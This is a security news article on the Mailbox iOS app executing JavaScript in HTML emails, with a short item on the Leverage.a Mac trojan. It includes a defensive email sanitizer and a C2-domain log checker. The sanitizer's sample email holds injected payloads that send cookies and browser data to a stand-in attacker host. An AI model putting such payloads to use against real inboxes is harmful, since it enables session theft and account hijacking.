UPDATE – The popular Mailbox app for iOS has a serious security weakness. A security researcher in Italy recently discovered that the app automatically executes any JavaScript contained in an HTML email it renders.

“It is just a bad design choice,” said researcher Michele Spagnulo, a computer engineering student in Milan who has collected four Google security rewards. “Mailbox.app by default also loads external images in emails, which is bad for privacy because the sender can know the exact time when you opened the mail and several other pieces of information about you. JavaScript execution is surely more serious.”

Users could be exposed to account hijacking, spam and phishing attacks simply by opening an HTML email containing embedded JavaScript.

“Allowing JavaScript in emails is a bad idea security-wise, and this is why it is stripped out of HTML email by default in all major email clients,” Spagnulo said.
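The stripping that Spagnulo describes, and the external-image blocking he mentions above, look roughly like the following. This is an added illustration written for this page, not code from the article, from Mailbox or from Dropbox: a minimal sanitizer of the kind mainstream mail clients apply to HTML mail before rendering it. The element and attribute names are standard HTML; the placeholder image URL, the sample message and the counters are this example's own choices. Regex tag handling is used only to keep the example dependency-free; a real client should sanitize on a parsed DOM rather than on the raw string.

```javascript
'use strict';

// Added example (not code from the article, Mailbox or Dropbox): what a mail
// client does to HTML mail before rendering it. It drops script-bearing
// elements, inline event handlers and javascript: URLs, and replaces remote
// images so the sender cannot learn when the message was opened.

// Elements removed outright because they execute code or load active content.
const ACTIVE_ELEMENTS = new Set([
  'script', 'iframe', 'object', 'embed', 'applet', 'style', 'meta', 'link', 'base', 'form',
]);
// Attributes that carry a URL and can therefore smuggle a javascript: scheme.
const URL_ATTRIBUTES = new Set(['href', 'src', 'action', 'formaction', 'background', 'xlink:href']);
// Remote image sources are replaced with this (the UI can offer "load images").
const PLACEHOLDER_IMAGE = 'about:blank';
// name, name="v", name='v', name=v  (groups 2..4 hold the value)
const ATTR_RE = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function decodeNumericEntities(s) {
  const fromCode = (code) => (code > 0x10ffff ? '' : String.fromCodePoint(code));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromCode(parseInt(dec, 10)))
    .replace(/&tab;/gi, '\t')
    .replace(/&newline;/gi, '\n');
}

// Browsers tolerate entity-encoded and control-character-padded schemes
// ("java\tscript:", "&#106;avascript:"), so normalise before checking.
function isDangerousUrl(value) {
  const scheme = decodeNumericEntities(value).replace(/[\x00-\x20]/g, '').toLowerCase();
  return /^(javascript|vbscript|livescript|data):/.test(scheme);
}

function sanitizeAttributes(tag, rawAttrs, stats) {
  const kept = [];
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4];
    if (name.startsWith('on')) { stats.removedHandlers++; continue; }   // onload=, onerror=, ...
    // CSS can load remote resources or (in old engines) run script; counted with the URL removals.
    if (name === 'style' && /expression\s*\(|url\s*\(|javascript:/i.test(decodeNumericEntities(value ?? ''))) {
      stats.removedUrls++; continue;
    }
    if (URL_ATTRIBUTES.has(name) && value !== undefined && isDangerousUrl(value)) {
      stats.removedUrls++; continue;
    }
    if (tag === 'img' && name === 'src' && !/^\s*cid:/i.test(value ?? '')) {
      stats.blockedImages++;                                           // remote image = open-tracking beacon
      kept.push(`src="${PLACEHOLDER_IMAGE}"`);
      continue;
    }
    kept.push(value === undefined ? name : `${name}="${value.replace(/"/g, '&quot;')}"`);
  }
  return kept.length ? ' ' + kept.join(' ') : '';
}

function sanitizeHtmlEmail(html) {
  const stats = { removedElements: 0, removedHandlers: 0, removedUrls: 0, blockedImages: 0 };
  let out = html.replace(/<!--[\s\S]*?-->/g, '');        // comments can hide markup from naive filters
  // Drop container elements together with their body (the script source itself).
  for (const el of ['script', 'iframe', 'object', 'style']) {
    out = out.replace(new RegExp(`<${el}\\b[^>]*>[\\s\\S]*?<\\/${el}\\s*>`, 'gi'), () => {
      stats.removedElements++;
      return '';
    });
  }
  // An unterminated <script> makes the parser treat everything after it as script, so drop it all.
  out = out.replace(/<script\b[^>]*>[\s\S]*$/i, () => { stats.removedElements++; return ''; });
  // Rebuild every remaining tag from an attribute pass that drops handlers and dangerous URLs.
  out = out.replace(/<\/?([a-zA-Z][\w:-]*)([^>]*)>/g, (whole, name, rawAttrs) => {
    const tag = name.toLowerCase();
    if (ACTIVE_ELEMENTS.has(tag)) { stats.removedElements++; return ''; }
    if (whole.startsWith('</')) return `</${tag}>`;
    const selfClosing = /\/\s*$/.test(rawAttrs);
    return `<${tag}${sanitizeAttributes(tag, rawAttrs, stats)}${selfClosing ? ' /' : ''}>`;
  });
  return { html: out, ...stats };
}

// Constructed sample message (not the researcher's demo mail): a tracking pixel,
// an inline handler, an entity-obfuscated javascript: link and a script block.
const SAMPLE_EMAIL = [
  '<html><body>',
  '<h1 onmouseover="alert(1)">Invoice attached</h1>',
  '<p>Please review <a href="java&#115;cript:fetch(\'https://attacker.example/?c=\'+document.cookie)">your invoice</a>.</p>',
  '<img src="https://attacker.example/pixel.gif?id=12345" width="1" height="1">',
  '<img src="cid:logo@example.com" alt="logo">',
  '<script>location.href="https://attacker.example/?ua="+encodeURIComponent(navigator.userAgent)</script>',
  '</body></html>',
].join('\n');

console.log(JSON.stringify(sanitizeHtmlEmail(SAMPLE_EMAIL), null, 2));
```

Run with node; the output keeps the message text and the inline (cid:) logo, replaces the beacon with the placeholder, and reports one removed element, one removed handler, one removed URL and one blocked image. The point the researcher makes is the first pass: the script element and its body never reach the renderer, whatever the rest of the message looks like.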

A Dropbox representative said the risks are limited because of the inter-app security built into iOS.

“That being said, we’re working on an improvement to mail formatting that will mitigate the issue entirely and aim to ship it soon,” Dropbox told Threatpost.

Spagnulo demonstrated in a video on his site how the vulnerability is exploited. He used the app to open crafted emails that, when opened, sent tweets or SMS messages on his behalf, launched his Web browser, opened his photo archive and more.

“A spammer can collect detailed information on the device that viewed the email and display invasive ads, while a malicious attacker, using a browser exploitation framework can perform phishing attacks, hijackings, potentially transforming the victim into a zombie host,” he said.

The Mailbox app is an alternative to the mail client native to iOS on Apple mobile devices. Recently acquired by Dropbox, the app is promoted as having features that help users navigate their inbox in a more efficient manner, as well as speeding up delivery of messages.

Meanwhile, researchers at AlienVault Labs have dug deeper into the Leverage.a Trojan targeting Mac OS X machines. The Trojan was being used in targeted attacks and arrives purporting to be an image file. When the user executes the file, whether received via a phishing email or picked up from a compromised website, the malware attempts to connect to a command and control server, giving the botmaster remote control over the machine to install more malware or run code.

AlienVault researcher Eduardo De la Arada said the malware tries to connect to the domain servicesmsc[.]sytes[.]net, but that domain has since been taken down. The malware, he said, is written in Realbasic, which enables the attacker to build the code for other platforms such as Windows and Linux.
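Since the C2 domain has been taken down, the practical use of the indicator is retrospective: checking whether any host looked it up while it was live. The following is an added example written for this page, not code from AlienVault's write-up. It assumes BIND-style query log lines (constructed here, not real traffic), refangs the published `servicesmsc[.]sytes[.]net` form back into a real name, and matches on the domain or a subdomain of it rather than on a substring, so a name such as `notservicesmsc.sytes.net` does not false-positive.

```javascript
'use strict';

// Added example (not code from AlienVault's write-up): a retrospective DNS
// query-log check for the Leverage.a C2 indicator named in the article.

const C2_INDICATORS = ['servicesmsc[.]sytes[.]net'];   // as published, defanged

// Turn the defanged form back into a real, lower-case domain name.
function refang(indicator) {
  return indicator.replace(/\[\.\]/g, '.').replace(/\.$/, '').toLowerCase();
}

// True when the queried name is the indicator domain or lies beneath it
// (exact label boundary, so "notservicesmsc.sytes.net" is not a match).
function matchesIndicator(queriedName, indicatorDomain) {
  const q = queriedName.toLowerCase().replace(/\.$/, '');   // strip trailing root dot
  return q === indicatorDomain || q.endsWith('.' + indicatorDomain);
}

// Parse one BIND-style query log line (layout assumed); null for non-query lines.
function parseQueryLog(line) {
  const m = /client ([0-9a-f.:]+)#\d+: query: (\S+) IN (\S+)/i.exec(line);
  return m ? { client: m[1], name: m[2], type: m[3] } : null;
}

function findC2Lookups(lines, indicators = C2_INDICATORS) {
  const domains = indicators.map(refang);
  const hits = [];
  for (const line of lines) {
    const q = parseQueryLog(line);
    if (!q) continue;
    for (const d of domains) {
      if (matchesIndicator(q.name, d)) hits.push({ client: q.client, name: q.name, indicator: d });
    }
  }
  return hits;
}

// Constructed sample log lines (not real traffic). Line 3 is a near-miss that a
// substring match would wrongly flag; line 4 is a subdomain with a trailing dot.
const SAMPLE_DNS_LOG = [
  '19-Sep-2013 10:02:11.120 client 10.0.0.15#49152: query: www.apple.com IN A + (10.0.0.1)',
  '19-Sep-2013 10:02:14.301 client 10.0.0.23#51234: query: servicesmsc.sytes.net IN A + (10.0.0.1)',
  '19-Sep-2013 10:02:15.004 client 10.0.0.23#51235: query: notservicesmsc.sytes.net IN A + (10.0.0.1)',
  '19-Sep-2013 10:03:40.777 client 10.0.0.42#60001: query: cdn.SERVICESMSC.sytes.net. IN A + (10.0.0.1)',
];

console.log(findC2Lookups(SAMPLE_DNS_LOG));
```

Against the sample lines this reports two hits, clients 10.0.0.23 and 10.0.0.42, and correctly ignores the look-alike name. A second host of the same dynamic-DNS provider (sytes.net) is not by itself an indicator, which is why the match is anchored to the full published domain and not to its parent.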

Article updated at 1:40 p.m. ET with comments from Dropbox
